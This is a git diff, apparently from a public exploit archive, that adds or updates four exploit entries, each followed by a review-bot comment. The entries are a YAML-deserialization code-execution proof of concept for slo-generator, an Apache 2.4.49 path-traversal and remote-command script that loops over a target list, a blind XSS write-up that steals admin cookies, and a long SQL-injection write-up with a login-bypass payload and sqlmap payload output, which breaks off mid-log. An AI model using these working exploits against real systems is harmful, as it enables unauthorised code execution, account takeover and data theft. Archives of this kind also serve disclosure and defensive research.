diff --git a/exploits/linux/local/50385.txt b/exploits/linux/local/50385.txt
new file mode 100644
index 000000000..e570ab4c3
--- /dev/null
+++ b/exploits/linux/local/50385.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Google SLO-Generator 2.0.0 - Code Execution
+# Date: 2021-09-28
+# Exploit Author: Kiran Ghimire
+# Software Link: https://github.com/google/slo-generator/releases
+# Version: <= 2.0.0
+# Tested on: Linux
+# CVE: CVE-2021-22557
+
+##############################################################################
+
+*Introduction*:
+Is a tool to compute and export Service Level Objectives (SLOs), Error
+Budgets and Burn Rates, using configurations written in YAML (or JSON)
+format.
+
+##############################################################################
+
+*POC:*
+1. pip3 install slo-generator==2.0.0
+2. 2. Save the below yaml code in a file as exploit.yaml.
+ !!python/object/apply:os.system ["id;whoami"]
+3. Run the below command
+ slo-generator migrate -b exploit.yaml
+##############################################################################
\ No newline at end of file
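Review bot: The PoC step list carries a duplicated number on `2. 2. Save the below yaml code in a file as exploit.yaml.`, which should read `2. Save the below yaml code in a file as exploit.yaml.`. The advisory shows a `!!python/object/apply` tag being honoured but never names the defect behind it or a remediation; a tag of that kind is only instantiated by a PyYAML loader that permits arbitrary Python object tags, so a line such as "Root cause: the migrate command parses the input with a non-safe YAML loader; remediation: parse with `yaml.safe_load` (SafeLoader)" would give defenders something actionable, to be confirmed against the project source before it is stated as fact. The header gives `Version: <= 2.0.0` but no fixed release, which is worth adding if one exists.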
diff --git a/exploits/multiple/webapps/50383.sh b/exploits/multiple/webapps/50383.sh
index aea6670d4..6c233d6fd 100755
--- a/exploits/multiple/webapps/50383.sh
+++ b/exploits/multiple/webapps/50383.sh
@@ -1,4 +1,4 @@
-# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal
+# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage: https://apache.org/
@@ -9,10 +9,14 @@
#!/bin/bash
-if [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then
-echo Set [TAGET-LIST.TXT] [PATH]
+if [[ $1 == '' ]]; [[ $2 == '' ]]; then
+echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
echo ./PoC.sh targets.txt /etc/passwd
exit
fi
for host in $(cat $1); do
-curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
\ No newline at end of file
+echo $host
+curl --proxy http://192.168.72.1:8080 -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
+
+# PoC.sh targets.txt /etc/passwd
+# PoC.sh targets.txt /bin/sh whoami
\ No newline at end of file
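Review bot: The guard on the new line `if [[ $1 == '' ]]; [[ $2 == '' ]]; then` still tests only `$2`, because the first `[[ … ]]` is a separate statement whose exit status is discarded before `then`, and `$3`, which the updated usage line now advertises as `[COMMAND]`, is never checked at all; `if [[ -z $1 || -z $2 ]]; then` covers the first two, with a `-z $3` clause if the command is mandatory. The `--proxy http://192.168.72.1:8080` hard-wired into the new `curl` line looks like a leftover from the author's interception setup rather than something that belongs in a committed script; it should be removed or taken from an optional argument so the behaviour does not silently depend on that host. The new trailing comments `# PoC.sh targets.txt /etc/passwd` and `# PoC.sh targets.txt /bin/sh whoami` also disagree with the unchanged `echo ./PoC.sh targets.txt /etc/passwd` usage line, which still shows only two arguments.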
diff --git a/exploits/php/webapps/50386.txt b/exploits/php/webapps/50386.txt
new file mode 100644
index 000000000..0813d0872
--- /dev/null
+++ b/exploits/php/webapps/50386.txt
@@ -0,0 +1,49 @@
+# Exploit Title: Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting
+# Date: 2021-10-06
+# Exploit Author: Yash Mahajan
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/online-dj-booking-management-system-using-php-and-mysql/
+# Version: V 1.0
+# Vulnerable endpoint: http://localhost/odms/book-services.php?bookid=1
+# Vulnerable Page URI : http://localhost/odms/admin/view-booking-detail.php?editid=10&&bookingid=989913724
+# Tested on Windows 10, XAMPP
+
+*Steps to Reproduce:*
+1) Navigate http://localhost/odms/book-services.php?bookid=1
+2) Enter Blind Xss payload `">&email=aa@gg.com&mobnum=9999999999
+&edate=2000-10-24&est=6+p.m&eetime=1+p.m&vaddress=">
+&eventtype=Pre+Engagement&addinfo=">&submit=Book
+
+
+Now to confirm the vulnerability
+
+3) Login as admin by navigating to http://localhost/odms/admin/login.php.
+4) Now as soon as admin visits /view-booking-detail.php to approve the booking, payload fires and attacker will get the details like ip address, cookies of admin
+5) Able to steal admin's cookies successfully!!
+
+#POC
+https://ibb.co/Vj3jn2d
+https://ibb.co/bm9MGdG
\ No newline at end of file
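Review bot: The write-up names `view-booking-detail.php` as the page where the payload fires but never says which stored booking fields are rendered unescaped, and it gives no remediation; from the request body the payload is placed in `vaddress`, `addinfo` and the first form field, so a line such as "Affected fields: booking address and additional-info (confirm against source); fix: HTML-encode booking data on output in the admin view, e.g. `htmlspecialchars()`" would make the advisory actionable for the vendor. The proof of exploitation is two external image links, which may disappear; quoting the relevant response fragment in the text would be more durable. The header line `# Tested on Windows 10, XAMPP` also omits the PHP version, which the other advisories in this commit record.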
diff --git a/exploits/php/webapps/50387.txt b/exploits/php/webapps/50387.txt
new file mode 100644
index 000000000..e6bd05373
--- /dev/null
+++ b/exploits/php/webapps/50387.txt
@@ -0,0 +1,1191 @@
+# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple SQL Injection (Unauthenticated)
+# Date: 07/10/2021
+# Exploit Author: Hubert Wojciechowski
+# Contact Author: snup.php@gmail.com
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
+# Version: 1.0
+# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+
+### SQL Injection
+
+# All requests can be sent by both an authenticated and a non-authenticated user
+
+# Example vulnerable pages and parameters:
+
+* http://localhost/traffic_offense/classes/Users.php
+ Parameters:
+ - id
+ - firstname
+ - lastname
+ - username
+
+* http://localhost/traffic_offense/classes/Login.php
+ Parameters:
+ - username
+ - password
+
+* http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present]
+ Parameters:
+ - id
+
+* http://localhost/traffic_offense/classes/Master.php
+ Parameters:
+ - id
+ - date_created
+ - ticket_no
+ - status
+ - offense_id
+ - fine
+ - code
+ - name
+
+-----------------------------------------------------------------------------------------------------------------------
+# POC
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example 1
+
+# Login request generate sql injection error
+
+POST /traffic_offense/classes/Login.php?f=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 30
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/traffic_offense/admin/login.php
+Cookie: PHPSESSID=5vr3fm16tmrncov6j4amftftmi
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+username=xxxx'&password=xxxx2'
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Wed, 06 Oct 2021 12:31:03 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 265
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
+Notice: Trying to get property 'num_rows' of non-object in C:\xampp\htdocs\traffic_offense\classes\Login.php on line 22
+{"status":"incorrect","last_qry":"SELECT * from users where username = 'xxxx'' and password = md5('xxxx2'') "}
+
+-----------------------------------------------------------------------------------------------------------------------
+# Exploitable request - login parameter can be any value
+
+POST /traffic_offense/classes/Login.php?f=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 47
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/traffic_offense/admin/login.php
+Cookie: PHPSESSID=5vr3fm16tmrncov6j4amftftmi
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+username=admin&password=xxxx')+or+'1'='1'+and+('1
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Wed, 06 Oct 2021 12:24:50 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 20
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+{"status":"success"}
+
+-----------------------------------------------------------------------------------------------------------------------
+Logged as admin account
+
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example 2
+
+# Sql injection detection on the example of pages with the id parameter
+
+# Login request generate sql error - add ' next to the id parameter
+
+GET /traffic_offense/admin/offenses/view_details.php?id=3' HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record
+Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+#Response from database - sql error
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 03:56:37 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 7837
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''3''' at line 1
+SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '3''
+Notice: Trying to get property 'num_rows' of non-object in C:\xampp\htdocs\traffic_offense\admin\offenses\view_details.php on line 10
+
+Notice: Trying to get property 'num_rows' of non-object in C:\xampp\htdocs\traffic_offense\admin\offenses\view_details.php on line 16
+[...]
+
+# Request - add '' next to the id parameter
+
+GET /traffic_offense/admin/offenses/view_details.php?id=3'' HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record
+Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+# Response did not return an error - sql injection confirmed
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 03:58:40 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 7214
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
+
+
+
+
+[...]
+
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example 3
+
+# Using sqlmap on an intercepted request http://localhost/traffic_offense/classes/Master.php
+
+POST /traffic_offense/classes/Master.php?f=save_offense_record HTTP/1.1
+Origin: http://localhost
+Content-Length: 1598
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Sec-Fetch-Site: same-origin
+Host: localhost:80
+Accept: application/json, text/javascript, */*; q=0.01
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Connection: close
+X-Requested-With: XMLHttpRequest
+Sec-Fetch-Mode: cors
+Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
+Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record&id=1
+Content-Type: multipart/form-data; boundary=---------------------------7900788429998101281579901385
+Sec-Fetch-Dest: empty
+
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1*
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00*
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1*
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1*
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652*
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3*
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001*
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+# Using the sqlmap utility
+
+C:\Users\Hubert\Desktop\sqlmapproject-sqlmap-24e3b6a>sqlmap.py --level=5 --risk=3 --dbms=MySQL -r C:\Users\Hubert\Desktop\0day\sql2 --proxy=http://127.0.0.1:8090
+ ___
+ __H__
+ ___ ___[']_____ ___ ___ {1.5.9.6#dev}
+|_ -| . [)] | .'| . |
+|___|_ [']_|_|_|__,| _|
+ |_|V... |_| https://sqlmap.org
+
+[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+[*] starting @ 05:52:47 /2021-10-07/
+
+[05:52:47] [INFO] parsing HTTP request from 'C:\Users\Hubert\Desktop\0day\sql2'
+custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q]
+
+Multipart-like data found in POST body. Do you want to process it? [Y/n/q]
+
+[05:52:51] [INFO] testing connection to the target URL
+[...]
+---
+Parameter: MULTIPART #4* ((custom) POST)
+ Type: boolean-based blind
+ Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+ Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652' RLIKE (SELECT (CASE WHEN (8015=8015) THEN '' ELSE 0x28 END)) AND 'howi'='howi
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652' AND (SELECT 4940 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(4940=4940,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zvbh'='zvbh
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652' AND (SELECT 7241 FROM (SELECT(SLEEP(5)))rEqK) AND 'CONm'='CONm
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+Parameter: MULTIPART #5* ((custom) POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3' AND 4015=4015 AND 'mPLR'='mPLR
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3' AND (SELECT 6830 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(6830=6830,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pbeA'='pbeA
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3' AND (SELECT 5446 FROM (SELECT(SLEEP(5)))QMKi) AND 'GfhC'='GfhC
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+Parameter: MULTIPART #6* ((custom) POST)
+ Type: boolean-based blind
+ Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+ Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001' RLIKE (SELECT (CASE WHEN (7186=7186) THEN '' ELSE 0x28 END)) AND 'rwJI'='rwJI
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001' AND (SELECT 2971 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(2971=2971,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OeqR'='OeqR
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001' AND (SELECT 5527 FROM (SELECT(SLEEP(5)))GfWJ) AND 'GtGB'='GtGB
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+Parameter: MULTIPART #2* ((custom) POST)
+ Type: boolean-based blind
+ Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+ Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
